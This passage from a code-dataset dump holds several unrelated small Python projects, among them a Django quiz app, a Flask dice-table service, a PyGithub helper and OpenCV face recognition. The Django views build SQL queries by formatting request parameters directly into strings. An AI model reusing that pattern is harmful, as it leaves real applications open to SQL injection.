'Bar',\n 'Baz': 'Qux',\n })\n\n assert match_typed_property('Foo', 'Bar')(node)\n assert match_typed_property('Baz', 'Qux')(node)\n assert not match_typed_property('Foo', '123')(node)\n assert not match_typed_property('Baz', '456')(node)\n assert not match_typed_property('unknown', 'Bar')(node)\n\n\ndef test_all():\n node = build_node(type_id='type-id', type_props={\n 'Foo': 'Bar',\n 'Baz': 'Qux',\n })\n\n assert match_all(\n match_type_id('type-id'),\n match_typed_property('Foo', 'Bar'),\n )(node)\n\n assert match_all(\n 
match_type_id('type-id'),\n match_typed_property('Foo', 'Bar'),\n match_typed_property('Baz', 'Qux'),\n )(node)\n\n assert not match_all(\n match_type_id('type-id'),\n match_typed_property('Foo', 'Qux'),\n )(node)\n\n assert match_all()(node)\n\n\ndef test_any():\n node = build_node(type_id='type-id', type_props={\n 'Foo': 'Bar',\n 'Baz': 'Qux',\n })\n\n assert match_any(\n match_type_id('type-id'),\n match_typed_property('Foo', 'Bar'),\n )(node)\n\n assert match_any(\n match_type_id('type-id'),\n match_typed_property('Foo', 'Bar'),\n match_typed_property('Baz', 'Qux'),\n )(node)\n\n assert match_any(\n match_type_id('type-id'),\n match_typed_property('Foo', 'Qux'),\n )(node)\n\n assert not match_any(\n match_type_id('type-id-2'),\n match_typed_property('Foo', 'Qux'),\n )(node)\n\n assert not match_any()(node)\n","repo_name":"RedForester/python_rf_client","sub_path":"tests/matchers_test.py","file_name":"matchers_test.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"32145388902","text":"# chapter 1 of functional python book\ndef sum(seq):\n if len(seq) == 0:\n return 0\n return seq[0] + sum(seq[1:])\n\nsum([1, 2, 3, 4, 1])\nsum([1])\n\n# recursive\ndef until(n, filter_func, v):\n if v == n:\n return []\n if filter_func(v):\n return [v] + until(n, filter_func, v+1)\n else:\n return until(n, filter_func, v+1)\n\n# now use lambda for one line functions\n\nmult_3_5 = lambda x: x % 3 == 0 or x % 5 == 0 \n\nmult_3_5(3)\nmult_3_5(5)\n\n# combine\nuntil(10, lambda x: x % 3 == 0 or x % 5 == 0, 0)\n\n# nested generator expression\nsum(n for n in range(1, 10) if n % 3 == 0 or n % 5 == 0)\n\n# object creation\n# plus operator is both commutative and associative\n1 + 2 + 3 + 4\n\n# can also be\n# fold values left to right\n# create intermediate values 3 and 6\n((1 + 2) + 3) + 4 \n\n# fold values right to left\n# intermediate objects 7 and 9 are created\n1 + (2 + (3 + 4)) \n\n# slight advantage working left to right\nimport timeit\ntimeit.timeit(\"((([] + [1]) + [2]) + [3]) + [4]\")\ntimeit.timeit(\"[] + ([1] + ([2] + ([3] + [4])))\")\n\n####\n# Important functional design that + has no hidden side effects\n####\n\n# stack of turtles\n# CPUs are generally procedural not functional or OO\n# three main layers of abstraction\n# 1) applications will be functions all the way down until \n# we hit the objects\n# 2) Underlying Python runtime environment that supports functional\n# programming is objects- all the way down- until we hit turtles\n# 3) The libraries that support python are a turtle on which python stands\n# \n# The OS and hardware form thier own stack of turtles\n# Nearing the end.\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"rjcmarkelz/python_the_hard_way","sub_path":"functional_python/chp1_1.py","file_name":"chp1_1.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35041206096","text":"\"\"\"\nCrabs\n\nhttps://adventofcode.com/2021/day/7\n\n\"\"\"\nimport numpy as np\nfrom aoc import parse_numbers\n\n\nCOST = {}\n\ndef get_cost(dist):\n if dist not in COST:\n COST[dist] = sum(range(1, dist + 1))\n return COST[dist]\n\ncost_func2 = np.frompyfunc(get_cost, 1, 1)\n\n\ndef solve(data, cost_func=None):\n crabs = np.array(parse_numbers(data)).reshape(-1, 1)\n targets = np.arange(min(crabs), max(crabs)+1)\n cost = np.abs(crabs - targets)\n if cost_func:\n cost = cost_func(cost)\n return min(cost.sum(axis=0))\n\n\nif __name__ == '__main__':\n input_data = open('input_data.txt').read()\n result = solve(input_data)\n print(f'Example 1: {result}')\n # 340056\n\n result = solve(input_data, cost_func2)\n print(f'Example 2: {result}')\n # 96592275\n","repo_name":"krother/advent_of_code","sub_path":"2021/day_07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"34028396889","text":"\nfrom django.shortcuts import redirect, render\nfrom django.http import HttpResponse\nfrom django.http import Http404\nfrom django.template import loader,RequestContext\nfrom django.shortcuts import render\nfrom django.views.decorators import csrf\nimport time\nimport os\nimport sqlite3\n# Create your views here.\n\n#带有用户登录,做题,保存记录 \n\ndef getml(wen):\n myml=os.getcwd()+\"\\\\\"+wen\n return(myml)\n\nml=getml(\"en.sqlite3\")\ndef sql_ml(request):\n \n\n return render(request, 'myen/sql_ml.htm')\n\ndef sql_db(mysql):\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(mysql)\n zd1=sj.fetchall()\n conn.commit()\n sj.close\n conn.close\n\n return zd1\n\ndef list_all(biaoming):\n zd={}\n tou=[]\n ml=getml(\"en.sqlite3\")\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(biaoming)\n zd1=sj.fetchall()\n des = sj.description\n for i in des:\n # print(i)\n tou.append(i[0])\n zd[\"tou\"]=tou\n zd[\"shuju\"]=zd1\n sj.close \n conn.close\n \n return zd\ndef sql_du(mysql):\n zd={}\n tou=[]\n ml=getml(\"en.sqlite3\")\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(mysql)\n zd1=sj.fetchall()\n # des = sj.description\n # for i in des:\n # tou.append(i[0])\n # zd[\"tou\"]=tou\n \n zd[\"shuju\"]=zd1\n sj.close \n conn.close\n \n return zd\n\ndef sql_xie(mysql):\n #通用sql语句,无返回值,写入数据库\n zd=\"\"\n ml=getml(\"en.sqlite3\")\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n # print(mysql)\n sj = conn.cursor()\n sj.execute(mysql)\n conn.commit()\n\n sj.close \n conn.close\n zd=mysql+\"ok\"\n return zd\n\ndef sj_du(request):\n ctx ={}\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(\"select * from danci ORDER BY RANDOM() limit 20\")\n zd1=sj.fetchall()\n des = sj.description\n ctx[\"tou\"]=des\n ctx[\"shuju\"]=zd1\n sj.close \n conn.close\n \n\n return render(request, \"myen/cs_list.htm\", {\"zd_list\":ctx})\n\n\n\n\ndef chuti(lei,xueke):\n zd1=[]\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(\"select * from timu where leibie='\"+ lei +\"' and zhangjie ='\"+xueke+\"' ORDER BY RANDOM() limit 1\")\n zd1=sj.fetchall()\n\n return zd1\ndef chuti_id(tm_id):\n zd1=[]\n conn=sqlite3.connect(ml) #创建指定数据库 硬盘\n sj = conn.cursor()\n sj.execute(\"select * from timu where myid=\" + tm_id)\n zd1=sj.fetchall()\n\n return zd1\n\n\n\ndef add_dan1(request):\n return render(request,\"myen/ls_add_dan.html\")\ndef add_dan2(request):\n timu1=[]\n timu2=[]\n zd={}\n jg=\"\"\n if request.POST:\n xueke=request.POST['D1']\n shuru=request.POST['S1']\n zd[\"xk\"]=xueke\n timu=fenge(shuru)\n for i in timu:\n tm_ls=i\n l=len(tm_ls)-1\n tm_ls[l]=str(tm_ls[l]).upper()\n tm_str=\"^\".join(tm_ls)\n \n \n mysql=\"insert into lishi(leixing,timu,xueke) values('单选','{0}','{1}')\".format(tm_str,xueke)\n # print(mysql)\n jg=jg+sql_xie(mysql)+\" \"\n # jg=jg+mysql+\" \"\n return render(request,\"myen/myshow.html\",{\"zd_list\":jg})\n\n\ndef fenge(mystr):\n myok=[]\n gc=[]\n mystr=mystr.replace(',',',')\n mystr=mystr.replace('\\'','’')\n mystr=mystr.replace('\\\"','“')\n \n mystr=mystr.replace('\\r\\n\\r\\n','^')\n gc=mystr.split('^')\n for i in gc:\n mystr1=i\n mystr1=mystr1.replace('\\r\\n','^')\n gc1=mystr1.split('^')\n myok.append(gc1)\n \n \n return myok\n\ndef timu1(request):\n jieguo=[]\n zz2=request.GET.get('user_id')\n zz1=request.GET.get('timu_id')\n zz3=request.GET.get('jl_id')\n if int(zz1)<1 :\n jilu=chuti1(zz2,0)\n # print(\"jilu:\",jilu)\n jieguo=timu_show(jilu[1])\n jieguo.append(zz2)\n 
jieguo.append(jilu[0])\n else:\n jieguo=timu_show(zz1)\n \n jieguo.append(zz2)\n jieguo.append(zz3)\n \n \n \n return render(request,\"myen/testshow.html\",{\"zd_list\":jieguo}) \n\ndef timu_show(timu_id):\n jieguo=[]\n i=[]\n mysql=\"select * from lishi where myid={0}\".format(timu_id)\n # print(mysql)\n zd=sql_du(mysql)[\"shuju\"]\n if len(zd)>0:\n # print(zd)\n i = zd[0]\n jieguo=i[2].split(\"^\")\n jieguo.insert(0,i[0])\n \n \n return jieguo\n \ndef timu2(request):\n jieguo={}\n tm_ls=[]\n if request.POST:\n zz2=request.GET.get('user_id')\n zz1=request.GET.get('timu_id')\n zz3=request.GET.get('jl_id')\n xueke=request.POST[\"R1\"]\n xuanze=chr(62+int(xueke))\n tm_ls=timu_show(zz1)\n jieguo[\"timu\"]=tm_ls\n jieguo[\"user_id\"]=zz2\n jieguo[\"xuanze\"]=xuanze\n jieguo[\"timu_id\"]=zz1\n jieguo['jilu_id']=zz3\n # print(tm_ls[6])\n if tm_ls[6]==xueke:\n defen=1\n else:\n defen=0\n mysql=\"update jilu set daan='{0}',defen='{2}' where myid={1}\".format(xueke,zz3,defen)\n a=sql_xie(mysql)\n new_tm=chuti1(zz2,0)\n if len(new_tm)==0:\n jieguo[\"jiesu\"]=0\n else:\n jieguo['jiesu']=new_tm[1]\n \n \n return render(request,\"myen/testout.html\",{\"zd_list\":jieguo}) \n \n \ndef userload(request):\n \n \n return render(request,\"myen/index.html\",{\"zd_list\":\"请选择班级和姓名\"})\n \ndef userload2(request):\n jieguo={}\n tm_ls=[]\n if request.POST:\n banji=request.POST[\"D1\"]\n xingming=request.POST[\"T1\"]\n if xingming==\"\":\n chu=\"姓名必须输入\"\n return render(request,\"myen/index.html\",{\"zd_list\":chu})\n t0=time.time()\n mysql=\"select * from denglu where banji='{0}' and xingming='{1}' order by myid desc\".format(banji,xingming)\n user_id=sql_du(mysql)[\"shuju\"]\n \n if len(user_id)>0:\n load_id=user_id[0][0]\n mysql=\"update denglu set shijian='{0}',jiesu='0' where myid={1} \".format(t0,load_id)\n # chu=mysql\n a=sql_xie(mysql)\n a=shaixun(load_id,40)\n jieguo[\"timu\"]=timuall(load_id)\n jieguo[\"u_id\"]=load_id\n # tm_ls=chuti1(load_id,0)\n \n # jieguo=timu_show(tm_ls[1])\n # jieguo.append(load_id)\n # jieguo.append(tm_ls[0])\n # chu=jieguo\n \n \n else:\n \n mysql=\"insert into denglu(banji,xingming,shijian,jiesu) values('{0}','{1}','{2}','{3}')\".format(banji,xingming,t0,'0')\n # chu=mysql\n chu=sql_xie(mysql)\n mysql=\"select * from denglu where banji='{0}' and xingming='{1}' order by myid desc\".format(banji,xingming)\n user_id=sql_du(mysql)[\"shuju\"]\n chu1=user_id[0][0]\n chu=shaixun(chu1,40)\n # tm_ls=chuti1(load_id,0)\n # jieguo=timu_show(tm_ls[1])\n # jieguo.append(load_id)\n # jieguo.append(tm_ls[0])\n jieguo[\"timu\"]=timuall(chu1)\n jieguo[\"u_id\"]=(chu1)\n \n \n\n return render(request,\"myen/testshowall.html\",{\"zd_list\":jieguo})\n\ndef shaixun(user_id,shu):\n mysql=\"delete from jilu where user_id={0}\".format(user_id)\n tm_str=sql_xie(mysql)\n tm_list=sql_du(mysql)[\"shuju\"]\n mysql=\"select myid from lishi ORDER BY RANDOM() limit {0}\".format(shu)\n \n tm_list=sql_du(mysql)[\"shuju\"]\n n=1\n for i in tm_list:\n \n mysql=\"insert into jilu(user_id,timu,jielun) values('{0}','{1}','{2}')\".format(user_id,i[0],n)\n # print(mysql)\n sql_xie(mysql)\n n=n+1\n jieguo=\"ok\"\n \n \n return jieguo\n\n# def chuti1(user_id,tm_id):\n# jieguo=[]\n# if tm_id==0:\n# mysql=\"select myid,timu from jilu where user_id='{0}' and daan= '^'\".format(user_id)\n# # print(mysql)\n# timu=sql_du(mysql)[\"shuju\"]\n# # print(\"timu:\",timu[0])\n \n# # timu=timu\n# # print(timu[0])\n \n# else:\n# # mysql=\"select myid,timu from jilu where user_id='{0}' and daan= '^'\".format(user_id)\n# # 
timu=sql_du(mysql)[\"shuju\"]\n# # print(\"timu:\",timu[0])\n \n# # timu=timu\n# # print(timu[0])\n# jieguo=timu[0]\n# return jieguo\n\ndef timushowall(request):\n chu={}\n chu[\"timu\"]=timuall(18)\n \n return render(request,\"myen/testshowall.html\",{\"zd_list\":chu})\n\ndef timuall(user_id):\n jieguo=[]\n mysql=\"select * from jilu where user_id={0}\".format(user_id)\n timu30=sql_du(mysql)[\"shuju\"]\n for i in timu30:\n jieguo.append(timu_dan(i[0],i[2]))\n # jieguo.append(timu30)\n # print(jieguo)\n return jieguo\n\ndef timu_dan(myid,timu_id):\n #返回list\n jieguo=[]\n mysql=\"select * from lishi where myid={0}\".format(timu_id)\n tm=sql_du(mysql)[\"shuju\"][0]\n tm_ls=tm[2].split(\"^\")\n # print(tm[2])\n # jieguo.append(tm_ls)\n jieguo.append(tm_ls[0]+\"\")\n a=\"\"\n for i in range(1,len(tm_ls)-1):\n if tm_ls[-1]==chr(i+64):\n a=a+\" {2} \".format(chr(64+i),myid,tm_ls[i])\n else:\n a=a+\" {2} \".format(chr(64+i),myid,tm_ls[i])\n \n \n a=a+\" \"\n jieguo.append(a)\n \n return jieguo\n\ndef timujieguo(request):\n jieguo={}\n daan=[]\n u_id=request.GET.get(\"u_id\")\n jieguo[\"u_id\"]=u_id\n mysql=\"select * from denglu where myid={0}\".format(u_id)\n hui=sql_du(mysql)[\"shuju\"]\n \n banji=request.POST\n # print(hui)\n jieguo[\"bj\"]=hui[0][1]\n jieguo[\"xm\"]=hui[0][2]\n jieguo[\"shi\"]=int(time.time())-int(eval(hui[0][3]))\n mysql=\"update denglu set jiesu='{1}' where myid={0}\".format(u_id,time.time())\n # print(mysql)\n jg=sql_xie(mysql)\n \n print(banji)\n # chu=banji[\"R1\"]\n defen=0\n for m,n in banji.items() :\n \n if len(n)==3 :\n defen=defen+1\n mysql=\"update jilu set daan='{0}' , defen={1} where myid={2}\".format(n[0],1,m)\n a=sql_xie(mysql)\n \n if len(n)==1:\n mysql=\"update jilu set daan='{0}' , defen={1} where myid={2}\".format(n,0,m)\n # print(m,n)\n # print(mysql)\n a=sql_xie(mysql)\n jieguo[\"fen\"]=defen\n \n \n \n \n return render(request,\"myen/testshowall3.html\",{\"zd_list\":jieguo})\n\ndef jieguolist(request):\n chu={}\n u_id=request.GET.get(\"u_id\")\n chu[\"timu\"]=timuchakan(u_id)\n \n return render(request,\"myen/testshowall2.html\",{\"zd_list\":chu})\n\ndef timuchakan(user_id):\n jieguo=[]\n daan=[]\n mysql=\"select * from jilu where user_id={0}\".format(user_id)\n hui=sql_du(mysql)[\"shuju\"]\n # print(mysql)\n for i in hui:\n # print(i[2],i[3])\n a=timu_dan2(i[3],i[2])\n jieguo.append(a)\n \n \n \n \n # jieguo=hui\n return jieguo\n\n\ndef timu_dan2(my_da,timu_id):\n #返回list\n jieguo=[]\n mysql=\"select * from lishi where myid={0}\".format(timu_id)\n tm=sql_du(mysql)[\"shuju\"][0]\n tm_ls=tm[2].split(\"^\")\n # print(tm[2])\n # jieguo.append(tm_ls)\n jieguo.append(tm_ls[0]+\"\")\n a=\"\"\n for i in range(1,len(tm_ls)-1):\n a=a+\"{0} \".format(tm_ls[i])\n \n a=a+\"正确答案:{0}\".format(tm_ls[-1])\n if my_da==\"^\":\n my_da=\"无\"\n a=a+\" 你的答案:{0}\".format(my_da)\n \n a=a+\" \"\n jieguo.append(a)\n \n return jieguo\n\ndef tongji(request):\n chu=[]\n \n mysql=\"select * from denglu order by banji,xingming\"\n jg=sql_du(mysql)[\"shuju\"]\n # chu[\"timu\"]=jg\n for i in jg:\n a=[]\n mysql=\"select sum(defen) from jilu where user_id={0}\".format(i[0])\n jg=sql_du(mysql)[\"shuju\"]\n a.append(i[1])\n a.append(i[2])\n \n # a[3]=int(eval(i[4])-eval(i[3]))\n a.append(jg[0][0])\n a.append(int(eval(i[4])-eval(i[3])))\n b=time.localtime(eval(i[3]))\n a.append(time.strftime(\"%Y-%m-%d %H:%M:%S\", b))\n chu.append(a)\n \n # print(a)\n \n return render(request,\"myen/tongji.html\",{\"zd_list\":chu})\n \n\n\n \n \n 
\n\n\n","repo_name":"boluohuixz3/djen","sub_path":"myen/myls.py","file_name":"myls.py","file_ext":"py","file_size_in_byte":12330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2552661241","text":"# from dicetables_db import RequestHandler, SQLConnection, MongoDBConnection\nimport os\n\nfrom flask import Flask, jsonify, render_template, request\n\nfrom flaskapp.dice_tables_tequest_handler import DiceTablesRequestHandler\n\napp = Flask(__name__)\n\n\n@app.route('/_get_table')\ndef add_numbers():\n reqeust_str = request.args.get('requestStr', '', type=str)\n # handler = RequestHandler(MongoDBConnection('test_app', 'test'))\n # handler = RequestHandler(SQLConnection(':memory:', 'test'))\n handler = DiceTablesRequestHandler(max_dice_value=6000)\n table_obj = handler.get_response(reqeust_str)\n # handler.close_connection()\n if 'error' in table_obj:\n return jsonify(table_obj), 400\n return jsonify(table_obj), 200\n\n\n@app.route('/')\ndef index():\n directory = os.path.dirname(__file__)\n instructions_path = os.path.join(directory, 'static', 'instructions.txt')\n with open(instructions_path, 'r') as f:\n instructions_text = f.read()\n\n intro_path = os.path.join(directory, 'static', 'intro.txt')\n with open(intro_path, 'r') as f:\n intro_text = f.read()\n return render_template('index.html', intro_text=intro_text, instruction_text=instructions_text)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"eric-s-s/dicetables_flask","sub_path":"flaskapp/myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39291938800","text":"from github import Github\n\nfrom config import get_github_access_token\n\nREPO_NAME = 'HerokuFiles'\n\n\ngithub = Github(get_github_access_token())\n\n\ndef get_repos():\n for repo in github.get_user().get_repos():\n print(repo.name)\n\n\ndef get_file(filename):\n repository = github.get_user().get_repo(REPO_NAME)\n file = repository.get_contents(filename)\n\n print(file.url)\n\n return file\n\n\ndef check_file_exist(filename):\n try:\n file = get_file(filename)\n except:\n return False\n\n return True\n\n\ndef put_file(filename, content):\n\n repository = github.get_user().get_repo(REPO_NAME)\n\n if check_file_exist(filename):\n print(f'update_file {filename}')\n f = get_file(filename)\n f = repository.update_file(filename, \"update_file via PyGithub\", content, f.sha)\n else:\n print(f'create_file {filename}')\n f = repository.create_file(filename, \"create_file via PyGithub\", content)\n\n\ndef get_user(name):\n user = github.get_user(name)\n\n return user\n\n","repo_name":"gcatanese/HerokuFiles","sub_path":"app/github_api.py","file_name":"github_api.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"70"}
+{"seq_id":"1296199905","text":"from aiogram.types import ReplyKeyboardMarkup, KeyboardButton\n\n\nasync def works_optional():\n menu = ReplyKeyboardMarkup(resize_keyboard=True)\n works = KeyboardButton('💰 Работать')\n fishing = KeyboardButton('🎣 Рыбалка')\n collect_bottle = KeyboardButton('🍾 Собирать бутылки')\n sell_bottle = KeyboardButton('💱🍾 Обмен бутылок')\n business = KeyboardButton('🤵♂️ Бизнес')\n profile = KeyboardButton('👤 Профиль')\n menu.row(works)\n menu.row(fishing)\n menu.row(collect_bottle, sell_bottle)\n menu.row(business)\n menu.row(profile)\n return menu","repo_name":"Papirus101/bomj_old","sub_path":"keyboards/reply/works_keyboard.py","file_name":"works_keyboard.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5509286043","text":"__author__ = 'Mj'\n\n\ndef BFS(graph, source):\n k = 0\n visited.append(source)\n level.setdefault(str(k), []).append(source)\n enqueue = [source]\n while enqueue:\n k += 1\n for node in graph.get(enqueue[0], []):\n if node not in graph and node not in visited:\n enqueue.append(node)\n level.setdefault(str(k), []).append(node)\n parent['Node ' + str(node)] = enqueue[0]\n visited.append(node)\n break\n if node not in visited:\n enqueue.append(node)\n level.setdefault(str(k), []).append(node)\n parent['Node ' + str(node)] = enqueue[0]\n visited.append(node)\n enqueue.pop(0)\n\n\nGraph = {}\nvisited = []\nlevel = {}\nparent = {}\nnumEdges = int(input().strip()) #all number of edges.\nfor i in range(numEdges):\n n1, n2 = list(map(int, input().strip().split())) #input all edges a -> b.\n Graph.setdefault(n1, []).append(n2)\nso = int(input(\"Enter source: \"))\nparent['Node ' + str(so)] = None\nBFS(Graph, so)\nprint(level)\nprint(parent)\nprint(visited)\n\n\n\n","repo_name":"manoj2509/Python-Practice","sub_path":"CLRS/2. BFS.py","file_name":"2. BFS.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"34252743040","text":"import sys\nfrom time import time\nimport timeit\nfrom datetime import datetime\nfrom scipy import stats, sparse\nfrom scipy.sparse.linalg import svds, eigs\nfrom scipy.special import expit\nimport numpy as np\nimport os\nimport pandas as pd\nfrom scipy.special import softmax\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.preprocessing import normalize\nfrom sklearn.manifold import TSNE\nfrom sklearn import metrics\nfrom collections import Counter\nfrom sklearn.preprocessing import normalize\nfrom scipy.stats import norm as dist_model\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.cross_decomposition import CCA\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy import spatial\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom utils import *\nsys.path.append(REPO_DIR)\nos.chdir(REPO_DIR)\nfrom plots import *\n\n\n\nif len(sys.argv) <= 2:\n\tpid = 0\n\ttotal_pid = 1\nelse:\n\tpid = int(sys.argv[1])\n\ttotal_pid = int(sys.argv[2])\n\nfig_dir = OUTPUT_DIR + '/Figures/CrossDataset/'\nif not os.path.exists(fig_dir):\n\tos.makedirs(fig_dir)\noutput_dir = OUTPUT_DIR + '/Crossdatasets/'\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\nontology_dir = OUTPUT_DIR+'/Ontology/CellOntology/'\n\nnn_nhidden = [100,50,25]\nkeep_prob = 0.7\nunseen_ratio = 0.5\nmetrics = ['AUROC(seen)','AUPRC(seen)','AUROC','AUPRC','AUROC(unseen)', 'AUPRC(unseen)','Accuracy@3','Accuracy@5']\nresult_file = output_dir + 'auprc.result.txt'\nif not os.path.isfile(result_file):\n\tfout = open(result_file,'w')\n\tpct = -1\n\tfor dname1 in dnames:\n\t\tfor dname2 in dnames:\n\t\t\tif dname1 == dname2:\n\t\t\t\tcontinue\n\t\t\tpct += 1\n\t\t\tif total_pid>1 and pct%total_pid != pid:\n\t\t\t\tcontinue\n\n\t\t\tfeature1, label1, genes1, ontology_nlp_file, ontology_file = read_singlecell_data(dname1, DATA_DIR,nsample=50000000)\n\t\t\tprint (np.unique(label1))\n\n\t\t\tco_dim = 5\n\t\t\tontology_emb_file = ontology_dir + str(co_dim)\n\t\t\tunseen_l, l2i, i2l, onto_net, Y_emb, cls2cls = ParseCLOnto(label1, co_dim = co_dim, use_pretrain = ontology_emb_file, ontology_nlp_file = ontology_nlp_file, ontology_file = ontology_file)\n\t\t\tncls = np.shape(cls2cls)[0]\n\t\t\tlabel1 = MapLabel2CL(label1, l2i)\n\t\t\tunseen_l = MapLabel2CL(unseen_l, l2i)\n\t\t\tnunseen = len(unseen_l)\n\t\t\tnseen = ncls - nunseen\n\n\t\t\tfeature2, label2, genes2, ontology_nlp_file, ontology_file = read_singlecell_data(dname2, DATA_DIR,nsample=50000000)\n\t\t\tprint (np.unique(label2))\n\t\t\tlabel2 = MapLabel2CL(label2, l2i)\n\t\t\tprint (set(label1) - set(label2))\n\t\t\tprint (len(set(label1) - set(label2)), len(set(label2) - set(label1)))\n\n\n\t\t\tcommon_genes = np.array(list(set(genes1) & set(genes2)))\n\t\t\ttrain_Y = label1\n\t\t\ttest_Y = label2\n\t\t\ttest_Y_ind = np.sort(np.array(list(set(test_Y) | set(train_Y))))\n\t\t\tprint ('ngenes:%d. 
seen: %d, ntrainY: %d, ntestY: %d, unseen: %d' % (len(common_genes), nseen, len(np.unique(train_Y)), len(np.unique(test_Y)), len(set(test_Y) - set(train_Y))))\n\t\t\tpred_Y_all = np.load(output_dir+dname1+'.'+dname2+'pred_Y_all.npy')\n\t\t\tres = evaluate(pred_Y_all, test_Y, unseen_l, nseen, metrics = metrics\n\t\t\t, Y_ind = test_Y_ind, write_to_file = fout, Y_net = onto_net, write_screen = True, prefix = dname1+'.'+dname2+'.'+str(len(set(test_Y) - set(train_Y)))+'.'+str(len(set(test_Y))))\n\tfout.close()\n\nndame = len(dnames)\nmat2i = {}\nfor metric in metrics:\n\tmat2i[metric] = np.empty((ndame, ndame))\n\tmat2i[metric][:] = np.NaN\nmat2i['Ratio of unseen cell types'] = np.empty((ndame, ndame))\nmat2i['Ratio of unseen cell types'][:] = np.NaN\ndname2i = {}\ni2dname = {}\nfor i in range(ndame):\n\tdname2i[dnames[i]] = i\n\ti2dname[i] = dnames[i]\nprint (dname2i)\nfin = open(result_file)\nfor line in fin:\n\tw = line.strip().split('\\t')\n\td1,d2,nunseen,ntest = w[0].split('.')\n\tnunseen_ratio = int(nunseen) * 1. / int(ntest)\n\td1i = dname2i[d1]\n\td2i = dname2i[d2]\n\tmat2i['Ratio of unseen cell types'][d1i,d2i] = nunseen_ratio\n\tfor i, metric in enumerate(metrics):\n\t\tmat2i[metric][d1i,d2i] = float(w[i+1])\n\nmethods = []\nfor dname in dnames:\n\tmethods.append(dname2keyword[dname])\nmetrics = list(mat2i.keys())\nmetrics.reverse()\nfor metric in metrics:\n\theat_mat = mat2i[metric]\n\tprint (fig_dir + metric + '.pdf')\n\tplot_heatmap_cross_dataset(heat_mat, methods=methods, file_name =fig_dir + metric.replace('\\n',' ') + '_resize0.pdf', title=metric, ylabel=metric)\n","repo_name":"intyawlrs/OnClass","sub_path":"reproduce/OnClass_reproduce/plot/PlotCrossDataset.py","file_name":"PlotCrossDataset.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"70"}
+{"seq_id":"18385508967","text":"import cv2\nimport os\nimport numpy as np\n\nnamelabels = [\"bill gates\", \"mark zuckerberg\"]\n\n#Code to detect face using harr cascade algorithm\nhaarCascadeDetector = cv2.CascadeClassifier(\"./cascades/haarcascade_frontalface_default.xml\")\ndef detectFace(img):\n faces = haarCascadeDetector.detectMultiScale(img, scaleFactor=1.1, minNeighbors=7, minSize=(40, 40),\n flags=cv2.CASCADE_SCALE_IMAGE)\n return faces\n\n\n#Step1: prepare training data\ndef prepareTrainingData(folderPath):\n\n faces = []\n labels = []\n\n #Read each directory\n for directoryName in os.listdir(folderPath):\n\n if directoryName.startswith(\".\"):\n continue\n\n #Read each image\n for imageName in os.listdir(folderPath + \"/\" + directoryName):\n\n if imageName.startswith(\".\"):\n continue\n\n #read each image\n imagePath = folderPath + \"/\" + directoryName + \"/\" + imageName\n image = cv2.imread(imagePath)\n\n #convert to gray scale\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n #detect faces\n detectedFaces = detectFace(gray)\n\n #store face and lables in an array\n for (x, y, w, h) in detectedFaces:\n faces.append(gray[y:y + w, x:x + h])\n labels.append(namelabels.index(directoryName))\n\n return faces, labels\n\n\nfaces, labels = prepareTrainingData(\"./trainingImages\")\nprint(\"Total faces: \", len(faces))\nprint(\"Total labels: \", len(labels))\n\n#Step2: create face recognizer and train the model\nfaceRecognizer = cv2.face.LBPHFaceRecognizer_create()\nfaceRecognizer.train(faces, np.array(labels))\n\n#step3: test the model by running test images and predict\ndef predictImage(img):\n\n # convert to gray scale\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n #detect faces\n detectedFaces = detectFace(gray)\n\n for (x, y, w, h) in detectedFaces:\n\n #draw rectangle on each face\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n #face model recognizer predicts the test image and returns the label\n label, confidence = faceRecognizer.predict(gray[y:y + w, x:x + h])\n\n #label is a number so get the associated name\n label_text = namelabels[label]\n\n #write name on the image\n cv2.putText(img, label_text, (x, y), cv2.FONT_HERSHEY_PLAIN, 1.1, (0, 255, 0), 2)\n\n #Show the image\n cv2.imshow(\"Predicted Image\", img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ntestImage1 = cv2.imread(\"./testingImages/test1.jpeg\")\npredictImage(testImage1)\n\ntestImage2 = 